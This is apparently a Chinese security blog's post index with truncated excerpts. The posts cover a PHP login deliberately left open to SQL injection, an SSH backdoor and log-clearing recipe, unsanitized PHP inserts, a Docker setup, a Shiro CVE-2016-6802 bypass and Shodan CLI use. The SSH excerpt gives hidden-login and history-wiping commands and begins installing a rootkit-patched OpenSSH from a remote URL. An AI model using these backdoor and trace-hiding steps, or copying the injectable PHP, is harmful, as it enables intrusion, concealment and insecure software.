Author: 系统自定义

PHP 登录(有sql注入和越权)

系统自定义 PHP

#0x01  login.html页面 <html> <form name=”login” action=”login.php” method=”post”></br> name:<input type=”text” name=”username” /></br> password:<input type=”test” name=”passwd” /></br> <input type=”submit” value=”ok” /> </form> #0x02 login.php页面 <?php include_once(“./conn.php”);   //sql数据链接配置文件 $name=$_POST[‘username’];         //获取用户html页面传输过 […]

查看全部

SSH后门和清除痕迹

系统自定义 Web安全与渗透

隐藏的远程登录(w 看不到) ssh -T user @ host /bin/bash -i 或 隐藏的远程登录(w 看不到) ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -if   对于SSH来说,登录主机之后先执行: unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace 然后是SSH留后门的方法,简单来说就是以下的代码: yum install -y openssl openssl-devel pam-devel http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz http://ft […]

查看全部

PHP实现(非ajax)提交数据后刷新页面

系统自定义 PHP

#0x01 数据库链接 conn.php <?php $con = mysql_connect(“localhost”,”root”,”123123aa”); if (!$con) { die(‘连接失败: ‘ . mysql_error()); } mysql_select_db(“数据库名称”, $con); ?> #oxo2 插入数据 add.php <?php include_once(“./conn.php”); $sql=”INSERT INTO info (id, type, name, url, ver) VALUES (‘$_POST[id]’,’$_POST[type]’,’$_POST[name]’,’$_POST[url]’,’$_POST[ver]’)”; if (!mysql_query($sql,$con)) { die(‘数据插入失败: ‘ […]

查看全部

ubuntu下安装docker并在docker中安装lamp

系统自定义 小折腾/小配置

1.安装docker root@ubuntu: sudo apt-get install software-properties-common #增加 add-apt-repository 命令 root@ubuntu: sudo apt-get install python-software-properties root@ubuntu: sudo add-apt-repository ppa:dotcloud/lxc-docker #增加一个ppa源,如:ppa:user/ppa-name root@ubuntu: sudo apt-get update #更新系统 root@ubuntu: sudo apt-get install lxc-docker   2.测试doctor是否安装成功   root@ubuntu:~# docker #出现如下信息表示docker安装成 […]

查看全部

Apache Shiro CVE-2016-6802 权限绕过漏洞

系统自定义 CVE漏洞复现

关于Apche shiro权限Bypass漏洞,漏洞代码段 public static String getContextPath(HttpServletRequest request) { String contextPath = (String) request.getAttribute(INCLUDE_CONTEXT_PATH_ATTRIBUTE); if (contextPath == null) { contextPath = request.getContextPath(); } if (“/”.equals(contextPath)) { // Invalid case, but happens for includes on Jetty: silently adapt it. contextPath = “”; } return decodeRequestString(re […]

查看全部

woobuntu安装shodan,进行命令行搜索

系统自定义 小折腾/小配置

安装方法: 一.通过python的easy_install 安装 easy_install shodan 二.配置你的shodan api key,这个可以注册shodan,然后在个人账号信息页面可以看到 shodan init  YOUR_API_KEY                          /**     我的是 jrSSDZmScPZNXr6lFJkKoxocJN****    **/ 三.在命令行执行的几个例子: 1.统计iis6.0 应用服务器总数. $ shodan count microsoft iis 6.0 2.下载iis 6.0 应用服务器的数据到本地,默认为gz压缩包,解压后数据为json格式,不过不是shodan会员只能下载一千条. $ shodan download microsoft-data microsoft iis 6.0 3.搜索主机/ip. […]

查看全部